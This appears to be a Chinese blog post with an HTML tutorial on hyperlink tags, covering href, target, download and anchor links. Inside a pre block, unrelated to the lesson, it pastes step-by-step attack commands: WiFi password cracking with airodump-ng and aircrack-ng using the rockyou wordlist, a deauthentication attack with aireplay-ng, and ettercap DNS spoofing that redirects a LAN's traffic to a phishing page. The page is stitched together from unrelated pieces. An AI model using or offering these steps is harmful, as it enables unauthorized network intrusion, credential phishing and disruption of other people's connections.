10、超链接标签

yu
yu
2024-09-30 / 0 评论 / 5 阅读 / 正在检测是否收录...
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>超链接标签</title>
</head>
<body>
    <!--
        一、超链接:可以从一个页面跳转到另一个页面
            1.使用a标签创建超链接
            2.超链接的属性
                href:用于指定跳转到目标页面的地址
                target:用于指定以什么方式打开页面
                    可选值:
                        _self:当前窗口打开,默认值
                        _blank:新窗口打开
    -->
    <!--1.外部页面链接-->
    <a href="http://www.baidu.com">百度一下</a>
    <a href="http://www.baidu.com"target="_blank">百度一下</a>

    <!--2.内部页面链接-->
    <a href="./8、图片标签.html">内部页面链接</a>
    <a href="/web/3、语义化标签.html">语义化链接</a>

    <!--3.空链接-->
    <a href="#">无指定页面,跳转到当前页面</a>

    <!--4.下载链接:若链接的路径是一个文件,则下载链接-->
    <a href="./photo/1.zip">下载链接</a>

    <!--5.给其他网页元素添加超链接。如:图片、表格等-->
    <a href="http://www.baidu.com"><img src="./photo/1.jpg"title="点我进来看看我"></a>

    <!--
        6.锚点链接:跳转到当前页面中的指定位置
            目标标签添加一个属性 id="指定的名称"。注意:id不能重复
            超链接 href 属性值为 "#指定的名称"
    -->
    <a href="#hh">去哈哈</a>
    <br>
    <a href="#ww">去哇哇</a>
    <pre>
    1.KALI系统的WIFI破解
    1.ifconfig 查看你的网卡是否连接成功
    2.airmon-ng start wlan0 开启网卡监听
    3.成功开启网卡监听
    4.airodump-ng wlan0
        扫描网卡后项目的介绍
            BSSID 代表我们wifi的mac地址
            PWR 代表WIFI信号强度,值越小,信号强度就越高
            CH 表示工作的信道号
            ESSID WIFI名词
    5.airodump-ng -c 6 -w 1 --bssid 你找到的wifibssid wlan0 抓取wifi连接数据包
    6.字典地址:cd /usr/share/wordlists
    7.ls -l 查看rockyou.txt.gz
    8.gzip -d rockyou.txt.gz 解压字典文件
    9.开始尝试破解wifi密码
    10.aircrack-ng -w /usr/share/wordlists/rockyou.txt 1-01.cap
    <h1 id="hh">定位一下</h1>
    反认证攻击:
        1. airodump-ng wlan0mon 扫描出WIFI列表
        2. 记录要攻击的WIFI BSSID
        3. 输入命令 airodump-ng -c [CH] --bssid [BSSID] -w [网卡名称] 输入完成后先不要敲击回车
        4. 新建一个终端 敲击命令 aireplay-ng -0 0 -a [BSSID] [网卡名称]
        5. 先启动第三步的命令,在启动第四步的命令
    <h2 id="ww">再定位一下</h2>

2.内网DNS欺骗,钓鱼
    (在开始使用前,先把前端页面的JS文件访问IP修改为你自己的IP)
    1.ettercap -G 打开工具
    2.route 查看当前主机网关
    3.ipconfig windows查看ip 
    4.添加网关到Target1 添加目标IP地址到Target2
    5.选择DNS欺骗插件 dns_spoof
    6.修改ettercap工具的dns解析文件 vim /etc/ettercap/etter.dns 在末尾添加 *    A    192.168.3.34
    7.开始攻击
    8.java -jar zhou-0.0.1-SNAPSHOT\(1\).jar
    9.访问回显页面:192.168.3.4:8080/list
    </pre>
    <a href="#">回到顶部</a>

</body>
</html>
0

评论 (0)

取消